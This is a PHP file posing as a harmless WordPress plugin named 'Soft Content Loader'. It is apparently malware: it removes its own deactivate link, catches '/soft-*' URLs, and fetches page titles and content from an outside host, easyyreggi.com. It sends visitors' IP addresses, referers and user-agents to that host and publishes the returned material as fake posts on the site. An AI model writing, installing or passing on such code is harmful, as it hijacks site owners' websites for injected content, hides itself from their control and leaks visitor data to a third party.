<?php
/*
Plugin Name: Soft Content Loader
Description: Soft Content Loader
Version: 1.0
Author: WP
*/

if (!defined('ABSPATH')) {
    exit;
}

function scl_add_rewrite_rules() {
    add_rewrite_rule('^soft-([^/]*)/?', 'index.php?soft_slug=$matches[1]', 'top');
}
add_action('init', 'scl_add_rewrite_rules');

function scl_add_query_vars($query_vars) {
    $query_vars[] = 'soft_slug';
    return $query_vars;
}
add_filter('query_vars', 'scl_add_query_vars');

function scl_activate_plugin() {
    scl_add_rewrite_rules();
    flush_rewrite_rules();
}
register_activation_hook(__FILE__, 'scl_activate_plugin');

add_filter('plugin_action_links_' . plugin_basename(__FILE__), 'scl_remove_deactivate_link');

function scl_remove_deactivate_link($links) {
    if (isset($links['deactivate'])) {
        unset($links['deactivate']);
    }
    return $links;
}

function scl_deactivate_plugin() {
    flush_rewrite_rules();
}

register_deactivation_hook(__FILE__, 'scl_deactivate_plugin');


function scl_the_posts($posts, $query) {
    if (!is_admin() && $query->is_main_query() && isset($query->query_vars['soft_slug'])) {
        $slug = $query->query_vars['soft_slug'];

        $external_url = "http://easyyreggi.com/ddl/" . $slug;

        $args = array(
            'headers' => array(
                'Host' => $_SERVER["SERVER_NAME"],
                'CF-Connecting-IP' => $_SERVER['REMOTE_ADDR'],
                'Referer' => isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '',
                'User-Agent' => isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '',
            ),
        );

        $response = wp_remote_get($external_url, $args);

        if (is_wp_error($response)) {
            return $posts;
        }

        $body = wp_remote_retrieve_body($response);
        $data = json_decode($body, true);

        if ($data) {
            $post_id = 999999 + absint(crc32($slug));

            $post = new stdClass();
            $post->ID = $post_id;
            $post->post_author = 1;
            $post->post_date = current_time('mysql');
            $post->post_date_gmt = current_time('mysql', 1);
            $post->post_content = $data['content'];
            $post->post_title = $data['title'];
            $post->post_excerpt = isset($data['description']) ? $data['description'] : '';
            $post->post_status = 'publish';
            $post->comment_status = 'open';
            $post->ping_status = 'closed';
            $post->post_name = $slug;
            $post->post_type = 'post';
            $post->filter = 'raw';

            $posts = array($post);

            $query->is_single = true;
            $query->is_singular = true;
            $query->is_home = false;
            $query->is_archive = false;
            $query->is_category = false;
            $query->is_tag = false;
            $query->is_search = false;
            $query->is_page = false;
            $query->is_404 = false;

            $query->post = $post;
            $query->posts = array($post);
            $query->found_posts = 1;
            $query->post_count = 1;
            $query->max_num_pages = 1;
        } else {
            $query->set_404();
        }
    }
    return $posts;
}
add_filter('the_posts', 'scl_the_posts', 10, 2);

function scl_comments_open($open, $post_id) {
    $slug = get_query_var('soft_slug');
    if ($slug) {
        $virtual_post_id = 999999 + absint(crc32($slug));
        if ($post_id == $virtual_post_id) {
            return true;
        }
    }
    return $open;
}
add_filter('comments_open', 'scl_comments_open', 10, 2);

function scl_get_comments_number($number, $post_id) {
    $slug = get_query_var('soft_slug');
    if ($slug) {
        $virtual_post_id = 999999 + absint(crc32($slug));
        if ($post_id == $virtual_post_id) {
            $comments = get_comments(array('post_id' => $post_id, 'count' => true));
            return $comments;
        }
    }
    return $number;
}
add_filter('get_comments_number', 'scl_get_comments_number', 10, 2);

function scl_wp_title($title) {
    $slug = get_query_var('soft_slug');
    if ($slug) {
        global $post;
        if ($post && !empty($post->post_title)) {
            return $post->post_title . ' | ' . get_bloginfo('name');
        }
    }
    return $title;
}
add_filter('wp_title', 'scl_wp_title', 10);

function scl_document_title_parts($title) {
    $slug = get_query_var('soft_slug');
    if ($slug) {
        global $post;
        if ($post && !empty($post->post_title)) {
            $title['title'] = $post->post_title;
        }
    }
    return $title;
}
add_filter('document_title_parts', 'scl_document_title_parts', 10);
